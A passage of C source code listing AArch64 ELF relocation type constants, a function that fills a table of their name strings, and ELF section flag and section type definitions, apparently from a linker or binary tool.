R_AARCH64_JUMP26 = 282,
R_AARCH64_CALL26 = 283,
R_AARCH64_LDST16_ABS_LO12_NC = 284,
R_AARCH64_LDST32_ABS_LO12_NC = 285,
R_AARCH64_LDST64_ABS_LO12_NC = 286,
R_AARCH64_MOVW_PREL_G0 = 287,
R_AARCH64_MOVW_PREL_G0_NC = 288,
R_AARCH64_MOVW_PREL_G1 = 289,
R_AARCH64_MOVW_PREL_G1_NC = 290,
R_AARCH64_MOVW_PREL_G2 = 291,
R_AARCH64_MOVW_PREL_G2_NC = 292,
R_AARCH64_MOVW_PREL_G3 = 293,
R_AARCH64_LDST128_ABS_LO12_NC = 299,
R_AARCH64_MOVW_GOTOFF_G0 = 300,
R_AARCH64_MOVW_GOTOFF_G0_NC = 301,
R_AARCH64_MOVW_GOTOFF_G1 = 302,
R_AARCH64_MOVW_GOTOFF_G1_NC = 303,
R_AARCH64_MOVW_GOTOFF_G2 = 304,
R_AARCH64_MOVW_GOTOFF_G2_NC = 305,
R_AARCH64_MOVW_GOTOFF_G3 = 306,
R_AARCH64_GOTREL64 = 307,
R_AARCH64_GOTREL32 = 308,
R_AARCH64_GOT_LD_PREL19 = 309,
R_AARCH64_LD64_GOTOFF_LO15 = 310,
R_AARCH64_ADR_GOT_PAGE = 311,
R_AARCH64_LD64_GOT_LO12_NC = 312,
R_AARCH64_LD64_GOTPAGE_LO15 = 313,
R_AARCH64_TLSGD_ADR_PREL21 = 512,
R_AARCH64_TLSGD_ADR_PAGE21 = 513,
R_AARCH64_TLSGD_ADD_LO12_NC = 514,
R_AARCH64_TLSGD_MOVW_G1 = 515,
R_AARCH64_TLSGD_MOVW_G0_NC = 516,
R_AARCH64_TLSLD_ADR_PREL21 = 517,
R_AARCH64_TLSLD_ADR_PAGE21 = 518,
R_AARCH64_TLSLD_ADD_LO12_NC = 519,
R_AARCH64_TLSLD_MOVW_G1 = 520,
R_AARCH64_TLSLD_MOVW_G0_NC = 521,
R_AARCH64_TLSLD_LD_PREL19 = 522,
R_AARCH64_TLSLD_MOVW_DTPREL_G2 = 523,
R_AARCH64_TLSLD_MOVW_DTPREL_G1 = 524,
R_AARCH64_TLSLD_MOVW_DTPREL_G1_NC = 525,
R_AARCH64_TLSLD_MOVW_DTPREL_G0 = 526,
R_AARCH64_TLSLD_MOVW_DTPREL_G0_NC = 527,
R_AARCH64_TLSLD_ADD_DTPREL_HI12 = 528,
R_AARCH64_TLSLD_ADD_DTPREL_LO12 = 529,
R_AARCH64_TLSLD_ADD_DTPREL_LO12_NC = 530,
R_AARCH64_TLSLD_LDST8_DTPREL_LO12 = 531,
R_AARCH64_TLSLD_LDST8_DTPREL_LO12_NC = 532,
R_AARCH64_TLSLD_LDST16_DTPREL_LO12 = 533,
R_AARCH64_TLSLD_LDST16_DTPREL_LO12_NC = 534,
R_AARCH64_TLSLD_LDST32_DTPREL_LO12 = 535,
R_AARCH64_TLSLD_LDST32_DTPREL_LO12_NC = 536,
R_AARCH64_TLSLD_LDST64_DTPREL_LO12 = 537,
R_AARCH64_TLSLD_LDST64_DTPREL_LO12_NC = 538,
R_AARCH64_TLSIE_MOVW_GOTTPREL_G1 = 539,
R_AARCH64_TLSIE_MOVW_GOTTPREL_G0_NC = 540,
R_AARCH64_TLSIE_ADR_GOTTPREL_PAGE21 = 541,
R_AARCH64_TLSIE_LD64_GOTTPREL_LO12_NC = 542,
R_AARCH64_TLSIE_LD_GOTTPREL_PREL19 = 543,
R_AARCH64_TLSLE_MOVW_TPREL_G2 = 544,
R_AARCH64_TLSLE_MOVW_TPREL_G1 = 545,
R_AARCH64_TLSLE_MOVW_TPREL_G1_NC = 546,
R_AARCH64_TLSLE_MOVW_TPREL_G0 = 547,
R_AARCH64_TLSLE_MOVW_TPREL_G0_NC = 548,
R_AARCH64_TLSLE_ADD_TPREL_HI12 = 549,
R_AARCH64_TLSLE_ADD_TPREL_LO12 = 550,
R_AARCH64_TLSLE_ADD_TPREL_LO12_NC = 551,
R_AARCH64_TLSLE_LDST8_TPREL_LO12 = 552,
R_AARCH64_TLSLE_LDST8_TPREL_LO12_NC = 553,
R_AARCH64_TLSLE_LDST16_TPREL_LO12 = 554,
R_AARCH64_TLSLE_LDST16_TPREL_LO12_NC = 555,
R_AARCH64_TLSLE_LDST32_TPREL_LO12 = 556,
R_AARCH64_TLSLE_LDST32_TPREL_LO12_NC = 557,
R_AARCH64_TLSLE_LDST64_TPREL_LO12 = 558,
R_AARCH64_TLSLE_LDST64_TPREL_LO12_NC = 559,
R_AARCH64_TLSDESC_LD_PREL19 = 560,
R_AARCH64_TLSDESC_ADR_PREL21 = 561,
R_AARCH64_TLSDESC_ADR_PAGE21 = 562,
R_AARCH64_TLSDESC_LD64_LO12 = 563,
R_AARCH64_TLSDESC_ADD_LO12 = 564,
R_AARCH64_TLSDESC_OFF_G1 = 565,
R_AARCH64_TLSDESC_OFF_G0_NC = 566,
R_AARCH64_TLSDESC_LDR = 567,
R_AARCH64_TLSDESC_ADD = 568,
R_AARCH64_TLSDESC_CALL = 569,
R_AARCH64_TLSLE_LDST128_TPREL_LO12 = 570,
R_AARCH64_TLSLE_LDST128_TPREL_LO12_NC = 571,
R_AARCH64_TLSLD_LDST128_DTPREL_LO12 = 572,
R_AARCH64_TLSLD_LDST128_DTPREL_LO12_NC = 573,
R_AARCH64_COPY = 1024,
R_AARCH64_GLOB_DAT = 1025,
R_AARCH64_JUMP_SLOT = 1026,
R_AARCH64_RELATIVE = 1027,
R_AARCH64_TLS_DTPMOD64 = 1028,
R_AARCH64_TLS_DTPREL64 = 1029,
R_AARCH64_TLS_TPREL64 = 1030,
R_AARCH64_TLS_DTPMOD = 1028,
R_AARCH64_TLS_DTPREL = 1029,
R_AARCH64_TLS_TPREL = 1030,
R_AARCH64_TLSDESC = 1031,
R_AARCH64_IRELATIVE = 1032,
R_AARCH64_RELOC_NUM = R_AARCH64_IRELATIVE + 1,
};
static const char *reloc_name[R_AARCH64_RELOC_NUM];
static void init_reloc_name()
{
reloc_name[R_AARCH64_NONE] = "R_AARCH64_NONE";
reloc_name[R_AARCH64_P32_ABS32] = "R_AARCH64_P32_ABS32";
reloc_name[R_AARCH64_P32_ABS16] = "R_AARCH64_P32_ABS16";
reloc_name[R_AARCH64_P32_PREL32] = "R_AARCH64_P32_PREL32";
reloc_name[R_AARCH64_P32_PREL16] = "R_AARCH64_P32_PREL16";
reloc_name[R_AARCH64_P32_MOVW_UABS_G0] = "R_AARCH64_P32_MOVW_UABS_G0";
reloc_name[R_AARCH64_P32_MOVW_UABS_G0_NC] = "R_AARCH64_P32_MOVW_UABS_G0_NC";
reloc_name[R_AARCH64_P32_MOVW_UABS_G1] = "R_AARCH64_P32_MOVW_UABS_G1";
reloc_name[R_AARCH64_P32_MOVW_SABS_G0] = "R_AARCH64_P32_MOVW_SABS_G0";
reloc_name[R_AARCH64_P32_LD_PREL_LO19] = "R_AARCH64_P32_LD_PREL_LO19";
reloc_name[R_AARCH64_P32_ADR_PREL_LO21] = "R_AARCH64_P32_ADR_PREL_LO21";
reloc_name[R_AARCH64_P32_ADR_PREL_PG_HI21] = "R_AARCH64_P32_ADR_PREL_PG_HI21";
reloc_name[R_AARCH64_P32_ADD_ABS_LO12_NC] = "R_AARCH64_P32_ADD_ABS_LO12_NC";
reloc_name[R_AARCH64_P32_LDST8_ABS_LO12_NC] = "R_AARCH64_P32_LDST8_ABS_LO12_NC";
reloc_name[R_AARCH64_P32_LDST16_ABS_LO12_NC] = "R_AARCH64_P32_LDST16_ABS_LO12_NC";
reloc_name[R_AARCH64_P32_LDST32_ABS_LO12_NC] = "R_AARCH64_P32_LDST32_ABS_LO12_NC";
reloc_name[R_AARCH64_P32_LDST64_ABS_LO12_NC] = "R_AARCH64_P32_LDST64_ABS_LO12_NC";
reloc_name[R_AARCH64_P32_LDST128_ABS_LO12_NC] = "R_AARCH64_P32_LDST128_ABS_LO12_NC";
reloc_name[R_AARCH64_P32_TSTBR14] = "R_AARCH64_P32_TSTBR14";
reloc_name[R_AARCH64_P32_CONDBR19] = "R_AARCH64_P32_CONDBR19";
reloc_name[R_AARCH64_P32_JUMP26] = "R_AARCH64_P32_JUMP26";
reloc_name[R_AARCH64_P32_CALL26] = "R_AARCH64_P32_CALL26";
reloc_name[R_AARCH64_P32_MOVW_PREL_G0] = "R_AARCH64_P32_MOVW_PREL_G0";
reloc_name[R_AARCH64_P32_MOVW_PREL_G0_NC] = "R_AARCH64_P32_MOVW_PREL_G0_NC";
reloc_name[R_AARCH64_P32_MOVW_PREL_G1] = "R_AARCH64_P32_MOVW_PREL_G1";
reloc_name[R_AARCH64_P32_GOT_LD_PREL19] = "R_AARCH64_P32_GOT_LD_PREL19";
reloc_name[R_AARCH64_P32_ADR_GOT_PAGE] = "R_AARCH64_P32_ADR_GOT_PAGE";
reloc_name[R_AARCH64_P32_LD32_GOT_LO12_NC] = "R_AARCH64_P32_LD32_GOT_LO12_NC";
reloc_name[R_AARCH64_P32_LD32_GOTPAGE_LO14] = "R_AARCH64_P32_LD32_GOTPAGE_LO14";
reloc_name[R_AARCH64_P32_TLSGD_ADR_PREL21] = "R_AARCH64_P32_TLSGD_ADR_PREL21";
reloc_name[R_AARCH64_P32_TLSGD_ADR_PAGE21] = "R_AARCH64_P32_TLSGD_ADR_PAGE21";
reloc_name[R_AARCH64_P32_TLSGD_ADD_LO12_NC] = "R_AARCH64_P32_TLSGD_ADD_LO12_NC";
reloc_name[R_AARCH64_P32_TLSLD_ADR_PREL21] = "R_AARCH64_P32_TLSLD_ADR_PREL21";
reloc_name[R_AARCH64_P32_TLSLD_ADR_PAGE21] = "R_AARCH64_P32_TLSLD_ADR_PAGE21";
reloc_name[R_AARCH64_P32_TLSLD_ADD_LO12_NC] = "R_AARCH64_P32_TLSLD_ADD_LO12_NC";
reloc_name[R_AARCH64_P32_TLSLD_MOVW_DTPREL_G1] = "R_AARCH64_P32_TLSLD_MOVW_DTPREL_G1";
reloc_name[R_AARCH64_P32_TLSLD_MOVW_DTPREL_G0] = "R_AARCH64_P32_TLSLD_MOVW_DTPREL_G0";
reloc_name[R_AARCH64_P32_TLSLD_MOVW_DTPREL_G0_NC] = "R_AARCH64_P32_TLSLD_MOVW_DTPREL_G0_NC";
reloc_name[R_AARCH64_P32_TLSLD_ADD_DTPREL_HI12] = "R_AARCH64_P32_TLSLD_ADD_DTPREL_HI12";
reloc_name[R_AARCH64_P32_TLSLD_ADD_DTPREL_LO12] = "R_AARCH64_P32_TLSLD_ADD_DTPREL_LO12";
reloc_name[R_AARCH64_P32_TLSLD_ADD_DTPREL_LO12_NC] = "R_AARCH64_P32_TLSLD_ADD_DTPREL_LO12_NC";
reloc_name[R_AARCH64_P32_TLSIE_ADR_GOTTPREL_PAGE21] = "R_AARCH64_P32_TLSIE_ADR_GOTTPREL_PAGE21";
reloc_name[R_AARCH64_P32_TLSIE_LD32_GOTTPREL_LO12_NC] = "R_AARCH64_P32_TLSIE_LD32_GOTTPREL_LO12_NC";
reloc_name[R_AARCH64_P32_TLSIE_LD_GOTTPREL_PREL19] = "R_AARCH64_P32_TLSIE_LD_GOTTPREL_PREL19";
reloc_name[R_AARCH64_P32_TLSLE_MOVW_TPREL_G1] = "R_AARCH64_P32_TLSLE_MOVW_TPREL_G1";
reloc_name[R_AARCH64_P32_TLSLE_MOVW_TPREL_G0] = "R_AARCH64_P32_TLSLE_MOVW_TPREL_G0";
reloc_name[R_AARCH64_P32_TLSLE_MOVW_TPREL_G0_NC] = "R_AARCH64_P32_TLSLE_MOVW_TPREL_G0_NC";
reloc_name[R_AARCH64_P32_TLSLE_ADD_TPREL_HI12] = "R_AARCH64_P32_TLSLE_ADD_TPREL_HI12";
reloc_name[R_AARCH64_P32_TLSLE_ADD_TPREL_LO12] = "R_AARCH64_P32_TLSLE_ADD_TPREL_LO12";
reloc_name[R_AARCH64_P32_TLSLE_ADD_TPREL_LO12_NC] = "R_AARCH64_P32_TLSLE_ADD_TPREL_LO12_NC";
reloc_name[R_AARCH64_P32_TLSLE_LDST8_TPREL_LO12] = "R_AARCH64_P32_TLSLE_LDST8_TPREL_LO12";
reloc_name[R_AARCH64_P32_TLSLE_LDST8_TPREL_LO12_NC] = "R_AARCH64_P32_TLSLE_LDST8_TPREL_LO12_NC";
reloc_name[R_AARCH64_P32_TLSLE_LDST16_TPREL_LO12] = "R_AARCH64_P32_TLSLE_LDST16_TPREL_LO12";
reloc_name[R_AARCH64_P32_TLSLE_LDST16_TPREL_LO12_NC] = "R_AARCH64_P32_TLSLE_LDST16_TPREL_LO12_NC";
reloc_name[R_AARCH64_P32_TLSLE_LDST32_TPREL_LO12] = "R_AARCH64_P32_TLSLE_LDST32_TPREL_LO12";
reloc_name[R_AARCH64_P32_TLSLE_LDST32_TPREL_LO12_NC] = "R_AARCH64_P32_TLSLE_LDST32_TPREL_LO12_NC";
reloc_name[R_AARCH64_P32_TLSLE_LDST64_TPREL_LO12] = "R_AARCH64_P32_TLSLE_LDST64_TPREL_LO12";
reloc_name[R_AARCH64_P32_TLSLE_LDST64_TPREL_LO12_NC] = "R_AARCH64_P32_TLSLE_LDST64_TPREL_LO12_NC";
reloc_name[R_AARCH64_P32_TLSDESC_LD_PREL19] = "R_AARCH64_P32_TLSDESC_LD_PREL19";
reloc_name[R_AARCH64_P32_TLSDESC_ADR_PREL21] = "R_AARCH64_P32_TLSDESC_ADR_PREL21";
reloc_name[R_AARCH64_P32_TLSDESC_ADR_PAGE21] = "R_AARCH64_P32_TLSDESC_ADR_PAGE21";
reloc_name[R_AARCH64_P32_TLSDESC_LD32_LO12_NC] = "R_AARCH64_P32_TLSDESC_LD32_LO12_NC";
reloc_name[R_AARCH64_P32_TLSDESC_ADD_LO12_NC] = "R_AARCH64_P32_TLSDESC_ADD_LO12_NC";
reloc_name[R_AARCH64_P32_TLSDESC_CALL] = "R_AARCH64_P32_TLSDESC_CALL";
reloc_name[R_AARCH64_P32_COPY] = "R_AARCH64_P32_COPY";
reloc_name[R_AARCH64_P32_GLOB_DAT] = "R_AARCH64_P32_GLOB_DAT";
reloc_name[R_AARCH64_P32_JUMP_SLOT] = "R_AARCH64_P32_JUMP_SLOT";
reloc_name[R_AARCH64_P32_RELATIVE] = "R_AARCH64_P32_RELATIVE";
reloc_name[R_AARCH64_P32_TLS_DTPMOD] = "R_AARCH64_P32_TLS_DTPMOD";
reloc_name[R_AARCH64_P32_TLS_DTPREL] = "R_AARCH64_P32_TLS_DTPREL";
reloc_name[R_AARCH64_P32_TLS_TPREL] = "R_AARCH64_P32_TLS_TPREL";
reloc_name[R_AARCH64_P32_TLSDESC] = "R_AARCH64_P32_TLSDESC";
reloc_name[R_AARCH64_P32_IRELATIVE] = "R_AARCH64_P32_IRELATIVE";
reloc_name[R_AARCH64_NULL] = "R_AARCH64_NULL";
reloc_name[R_AARCH64_ABS64] = "R_AARCH64_ABS64";
reloc_name[R_AARCH64_ABS32] = "R_AARCH64_ABS32";
reloc_name[R_AARCH64_ABS16] = "R_AARCH64_ABS16";
reloc_name[R_AARCH64_PREL64] = "R_AARCH64_PREL64";
reloc_name[R_AARCH64_PREL32] = "R_AARCH64_PREL32";
reloc_name[R_AARCH64_PREL16] = "R_AARCH64_PREL16";
reloc_name[R_AARCH64_MOVW_UABS_G0] = "R_AARCH64_MOVW_UABS_G0";
reloc_name[R_AARCH64_MOVW_UABS_G0_NC] = "R_AARCH64_MOVW_UABS_G0_NC";
reloc_name[R_AARCH64_MOVW_UABS_G1] = "R_AARCH64_MOVW_UABS_G1";
reloc_name[R_AARCH64_MOVW_UABS_G1_NC] = "R_AARCH64_MOVW_UABS_G1_NC";
reloc_name[R_AARCH64_MOVW_UABS_G2] = "R_AARCH64_MOVW_UABS_G2";
reloc_name[R_AARCH64_MOVW_UABS_G2_NC] = "R_AARCH64_MOVW_UABS_G2_NC";
reloc_name[R_AARCH64_MOVW_UABS_G3] = "R_AARCH64_MOVW_UABS_G3";
reloc_name[R_AARCH64_MOVW_SABS_G0] = "R_AARCH64_MOVW_SABS_G0";
reloc_name[R_AARCH64_MOVW_SABS_G1] = "R_AARCH64_MOVW_SABS_G1";
reloc_name[R_AARCH64_MOVW_SABS_G2] = "R_AARCH64_MOVW_SABS_G2";
reloc_name[R_AARCH64_LD_PREL_LO19] = "R_AARCH64_LD_PREL_LO19";
reloc_name[R_AARCH64_ADR_PREL_LO21] = "R_AARCH64_ADR_PREL_LO21";
reloc_name[R_AARCH64_ADR_PREL_PG_HI21] = "R_AARCH64_ADR_PREL_PG_HI21";
reloc_name[R_AARCH64_ADR_PREL_PG_HI21_NC] = "R_AARCH64_ADR_PREL_PG_HI21_NC";
reloc_name[R_AARCH64_ADD_ABS_LO12_NC] = "R_AARCH64_ADD_ABS_LO12_NC";
reloc_name[R_AARCH64_LDST8_ABS_LO12_NC] = "R_AARCH64_LDST8_ABS_LO12_NC";
reloc_name[R_AARCH64_TSTBR14] = "R_AARCH64_TSTBR14";
reloc_name[R_AARCH64_CONDBR19] = "R_AARCH64_CONDBR19";
reloc_name[R_AARCH64_JUMP26] = "R_AARCH64_JUMP26";
reloc_name[R_AARCH64_CALL26] = "R_AARCH64_CALL26";
reloc_name[R_AARCH64_LDST16_ABS_LO12_NC] = "R_AARCH64_LDST16_ABS_LO12_NC";
reloc_name[R_AARCH64_LDST32_ABS_LO12_NC] = "R_AARCH64_LDST32_ABS_LO12_NC";
reloc_name[R_AARCH64_LDST64_ABS_LO12_NC] = "R_AARCH64_LDST64_ABS_LO12_NC";
reloc_name[R_AARCH64_MOVW_PREL_G0] = "R_AARCH64_MOVW_PREL_G0";
reloc_name[R_AARCH64_MOVW_PREL_G0_NC] = "R_AARCH64_MOVW_PREL_G0_NC";
reloc_name[R_AARCH64_MOVW_PREL_G1] = "R_AARCH64_MOVW_PREL_G1";
reloc_name[R_AARCH64_MOVW_PREL_G1_NC] = "R_AARCH64_MOVW_PREL_G1_NC";
reloc_name[R_AARCH64_MOVW_PREL_G2] = "R_AARCH64_MOVW_PREL_G2";
reloc_name[R_AARCH64_MOVW_PREL_G2_NC] = "R_AARCH64_MOVW_PREL_G2_NC";
reloc_name[R_AARCH64_MOVW_PREL_G3] = "R_AARCH64_MOVW_PREL_G3";
reloc_name[R_AARCH64_LDST128_ABS_LO12_NC] = "R_AARCH64_LDST128_ABS_LO12_NC";
reloc_name[R_AARCH64_MOVW_GOTOFF_G0] = "R_AARCH64_MOVW_GOTOFF_G0";
reloc_name[R_AARCH64_MOVW_GOTOFF_G0_NC] = "R_AARCH64_MOVW_GOTOFF_G0_NC";
reloc_name[R_AARCH64_MOVW_GOTOFF_G1] = "R_AARCH64_MOVW_GOTOFF_G1";
reloc_name[R_AARCH64_MOVW_GOTOFF_G1_NC] = "R_AARCH64_MOVW_GOTOFF_G1_NC";
reloc_name[R_AARCH64_MOVW_GOTOFF_G2] = "R_AARCH64_MOVW_GOTOFF_G2";
reloc_name[R_AARCH64_MOVW_GOTOFF_G2_NC] = "R_AARCH64_MOVW_GOTOFF_G2_NC";
reloc_name[R_AARCH64_MOVW_GOTOFF_G3] = "R_AARCH64_MOVW_GOTOFF_G3";
reloc_name[R_AARCH64_GOTREL64] = "R_AARCH64_GOTREL64";
reloc_name[R_AARCH64_GOTREL32] = "R_AARCH64_GOTREL32";
reloc_name[R_AARCH64_GOT_LD_PREL19] = "R_AARCH64_GOT_LD_PREL19";
reloc_name[R_AARCH64_LD64_GOTOFF_LO15] = "R_AARCH64_LD64_GOTOFF_LO15";
reloc_name[R_AARCH64_ADR_GOT_PAGE] = "R_AARCH64_ADR_GOT_PAGE";
reloc_name[R_AARCH64_LD64_GOT_LO12_NC] = "R_AARCH64_LD64_GOT_LO12_NC";
reloc_name[R_AARCH64_LD64_GOTPAGE_LO15] = "R_AARCH64_LD64_GOTPAGE_LO15";
reloc_name[R_AARCH64_TLSGD_ADR_PREL21] = "R_AARCH64_TLSGD_ADR_PREL21";
reloc_name[R_AARCH64_TLSGD_ADR_PAGE21] = "R_AARCH64_TLSGD_ADR_PAGE21";
reloc_name[R_AARCH64_TLSGD_ADD_LO12_NC] = "R_AARCH64_TLSGD_ADD_LO12_NC";
reloc_name[R_AARCH64_TLSGD_MOVW_G1] = "R_AARCH64_TLSGD_MOVW_G1";
reloc_name[R_AARCH64_TLSGD_MOVW_G0_NC] = "R_AARCH64_TLSGD_MOVW_G0_NC";
reloc_name[R_AARCH64_TLSLD_ADR_PREL21] = "R_AARCH64_TLSLD_ADR_PREL21";
reloc_name[R_AARCH64_TLSLD_ADR_PAGE21] = "R_AARCH64_TLSLD_ADR_PAGE21";
reloc_name[R_AARCH64_TLSLD_ADD_LO12_NC] = "R_AARCH64_TLSLD_ADD_LO12_NC";
reloc_name[R_AARCH64_TLSLD_MOVW_G1] = "R_AARCH64_TLSLD_MOVW_G1";
reloc_name[R_AARCH64_TLSLD_MOVW_G0_NC] = "R_AARCH64_TLSLD_MOVW_G0_NC";
reloc_name[R_AARCH64_TLSLD_LD_PREL19] = "R_AARCH64_TLSLD_LD_PREL19";
reloc_name[R_AARCH64_TLSLD_MOVW_DTPREL_G2] = "R_AARCH64_TLSLD_MOVW_DTPREL_G2";
reloc_name[R_AARCH64_TLSLD_MOVW_DTPREL_G1] = "R_AARCH64_TLSLD_MOVW_DTPREL_G1";
reloc_name[R_AARCH64_TLSLD_MOVW_DTPREL_G1_NC] = "R_AARCH64_TLSLD_MOVW_DTPREL_G1_NC";
reloc_name[R_AARCH64_TLSLD_MOVW_DTPREL_G0] = "R_AARCH64_TLSLD_MOVW_DTPREL_G0";
reloc_name[R_AARCH64_TLSLD_MOVW_DTPREL_G0_NC] = "R_AARCH64_TLSLD_MOVW_DTPREL_G0_NC";
reloc_name[R_AARCH64_TLSLD_ADD_DTPREL_HI12] = "R_AARCH64_TLSLD_ADD_DTPREL_HI12";
reloc_name[R_AARCH64_TLSLD_ADD_DTPREL_LO12] = "R_AARCH64_TLSLD_ADD_DTPREL_LO12";
reloc_name[R_AARCH64_TLSLD_ADD_DTPREL_LO12_NC] = "R_AARCH64_TLSLD_ADD_DTPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLD_LDST8_DTPREL_LO12] = "R_AARCH64_TLSLD_LDST8_DTPREL_LO12";
reloc_name[R_AARCH64_TLSLD_LDST8_DTPREL_LO12_NC] = "R_AARCH64_TLSLD_LDST8_DTPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLD_LDST16_DTPREL_LO12] = "R_AARCH64_TLSLD_LDST16_DTPREL_LO12";
reloc_name[R_AARCH64_TLSLD_LDST16_DTPREL_LO12_NC] = "R_AARCH64_TLSLD_LDST16_DTPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLD_LDST32_DTPREL_LO12] = "R_AARCH64_TLSLD_LDST32_DTPREL_LO12";
reloc_name[R_AARCH64_TLSLD_LDST32_DTPREL_LO12_NC] = "R_AARCH64_TLSLD_LDST32_DTPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLD_LDST64_DTPREL_LO12] = "R_AARCH64_TLSLD_LDST64_DTPREL_LO12";
reloc_name[R_AARCH64_TLSLD_LDST64_DTPREL_LO12_NC] = "R_AARCH64_TLSLD_LDST64_DTPREL_LO12_NC";
reloc_name[R_AARCH64_TLSIE_MOVW_GOTTPREL_G1] = "R_AARCH64_TLSIE_MOVW_GOTTPREL_G1";
reloc_name[R_AARCH64_TLSIE_MOVW_GOTTPREL_G0_NC] = "R_AARCH64_TLSIE_MOVW_GOTTPREL_G0_NC";
reloc_name[R_AARCH64_TLSIE_ADR_GOTTPREL_PAGE21] = "R_AARCH64_TLSIE_ADR_GOTTPREL_PAGE21";
reloc_name[R_AARCH64_TLSIE_LD64_GOTTPREL_LO12_NC] = "R_AARCH64_TLSIE_LD64_GOTTPREL_LO12_NC";
reloc_name[R_AARCH64_TLSIE_LD_GOTTPREL_PREL19] = "R_AARCH64_TLSIE_LD_GOTTPREL_PREL19";
reloc_name[R_AARCH64_TLSLE_MOVW_TPREL_G2] = "R_AARCH64_TLSLE_MOVW_TPREL_G2";
reloc_name[R_AARCH64_TLSLE_MOVW_TPREL_G1] = "R_AARCH64_TLSLE_MOVW_TPREL_G1";
reloc_name[R_AARCH64_TLSLE_MOVW_TPREL_G1_NC] = "R_AARCH64_TLSLE_MOVW_TPREL_G1_NC";
reloc_name[R_AARCH64_TLSLE_MOVW_TPREL_G0] = "R_AARCH64_TLSLE_MOVW_TPREL_G0";
reloc_name[R_AARCH64_TLSLE_MOVW_TPREL_G0_NC] = "R_AARCH64_TLSLE_MOVW_TPREL_G0_NC";
reloc_name[R_AARCH64_TLSLE_ADD_TPREL_HI12] = "R_AARCH64_TLSLE_ADD_TPREL_HI12";
reloc_name[R_AARCH64_TLSLE_ADD_TPREL_LO12] = "R_AARCH64_TLSLE_ADD_TPREL_LO12";
reloc_name[R_AARCH64_TLSLE_ADD_TPREL_LO12_NC] = "R_AARCH64_TLSLE_ADD_TPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLE_LDST8_TPREL_LO12] = "R_AARCH64_TLSLE_LDST8_TPREL_LO12";
reloc_name[R_AARCH64_TLSLE_LDST8_TPREL_LO12_NC] = "R_AARCH64_TLSLE_LDST8_TPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLE_LDST16_TPREL_LO12] = "R_AARCH64_TLSLE_LDST16_TPREL_LO12";
reloc_name[R_AARCH64_TLSLE_LDST16_TPREL_LO12_NC] = "R_AARCH64_TLSLE_LDST16_TPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLE_LDST32_TPREL_LO12] = "R_AARCH64_TLSLE_LDST32_TPREL_LO12";
reloc_name[R_AARCH64_TLSLE_LDST32_TPREL_LO12_NC] = "R_AARCH64_TLSLE_LDST32_TPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLE_LDST64_TPREL_LO12] = "R_AARCH64_TLSLE_LDST64_TPREL_LO12";
reloc_name[R_AARCH64_TLSLE_LDST64_TPREL_LO12_NC] = "R_AARCH64_TLSLE_LDST64_TPREL_LO12_NC";
reloc_name[R_AARCH64_TLSDESC_LD_PREL19] = "R_AARCH64_TLSDESC_LD_PREL19";
reloc_name[R_AARCH64_TLSDESC_ADR_PREL21] = "R_AARCH64_TLSDESC_ADR_PREL21";
reloc_name[R_AARCH64_TLSDESC_ADR_PAGE21] = "R_AARCH64_TLSDESC_ADR_PAGE21";
reloc_name[R_AARCH64_TLSDESC_LD64_LO12] = "R_AARCH64_TLSDESC_LD64_LO12";
reloc_name[R_AARCH64_TLSDESC_ADD_LO12] = "R_AARCH64_TLSDESC_ADD_LO12";
reloc_name[R_AARCH64_TLSDESC_OFF_G1] = "R_AARCH64_TLSDESC_OFF_G1";
reloc_name[R_AARCH64_TLSDESC_OFF_G0_NC] = "R_AARCH64_TLSDESC_OFF_G0_NC";
reloc_name[R_AARCH64_TLSDESC_LDR] = "R_AARCH64_TLSDESC_LDR";
reloc_name[R_AARCH64_TLSDESC_ADD] = "R_AARCH64_TLSDESC_ADD";
reloc_name[R_AARCH64_TLSDESC_CALL] = "R_AARCH64_TLSDESC_CALL";
reloc_name[R_AARCH64_TLSLE_LDST128_TPREL_LO12] = "R_AARCH64_TLSLE_LDST128_TPREL_LO12";
reloc_name[R_AARCH64_TLSLE_LDST128_TPREL_LO12_NC] = "R_AARCH64_TLSLE_LDST128_TPREL_LO12_NC";
reloc_name[R_AARCH64_TLSLD_LDST128_DTPREL_LO12] = "R_AARCH64_TLSLD_LDST128_DTPREL_LO12";
reloc_name[R_AARCH64_TLSLD_LDST128_DTPREL_LO12_NC] = "R_AARCH64_TLSLD_LDST128_DTPREL_LO12_NC";
reloc_name[R_AARCH64_COPY] = "R_AARCH64_COPY";
reloc_name[R_AARCH64_GLOB_DAT] = "R_AARCH64_GLOB_DAT";
reloc_name[R_AARCH64_JUMP_SLOT] = "R_AARCH64_JUMP_SLOT";
reloc_name[R_AARCH64_RELATIVE] = "R_AARCH64_RELATIVE";
reloc_name[R_AARCH64_TLS_DTPMOD64] = "R_AARCH64_TLS_DTPMOD64";
reloc_name[R_AARCH64_TLS_DTPREL64] = "R_AARCH64_TLS_DTPREL64";
reloc_name[R_AARCH64_TLS_TPREL64] = "R_AARCH64_TLS_TPREL64";
reloc_name[R_AARCH64_TLS_DTPMOD] = "R_AARCH64_TLS_DTPMOD";
reloc_name[R_AARCH64_TLS_DTPREL] = "R_AARCH64_TLS_DTPREL";
reloc_name[R_AARCH64_TLS_TPREL] = "R_AARCH64_TLS_TPREL";
reloc_name[R_AARCH64_TLSDESC] = "R_AARCH64_TLSDESC";
reloc_name[R_AARCH64_IRELATIVE] = "R_AARCH64_IRELATIV";
}
#define SHF_WRITE (1 << 0)
#define SHF_ALLOC (1 << 1)
#define SHF_EXECINSTR (1 << 2)
#define SHF_MERGE (1 << 4)
#define SHF_STRINGS (1 << 5)
#define SHF_INFO_LINK (1 << 6)
#define SHF_LINK_ORDER (1 << 7)
#define SHF_OS_NONCONFORMING (1 << 8)
#define SHF_GROUP (1 << 9)
#define SHF_TLS (1 << 10)
#define SHF_COMPRESSED (1 << 11)
#define SHF_MASKOS 0x0FF00000
#define SHF_GNU_BUILD_NOTE (1 << 20)
#define SHF_MASKPROC 0xF0000000
#define SHF_EXCLUDE 0x80000000
#define SHF_GNU_MBIND 0x01000000
#define SHT_NULL 0
#define SHT_PROGBITS 1
#define SHT_SYMTAB 2
#define SHT_STRTAB 3
#define SHT_RELA 4
#define SHT_HASH 5
#define SHT_DYNAMIC 6
#define SHT_NOTE 7
#define SHT_NOBITS 8
#define SHT_REL 9
#define SHT_SHLIB 10
#define SHT_DYNSYM 11
#define SHT_INIT_ARRAY 14
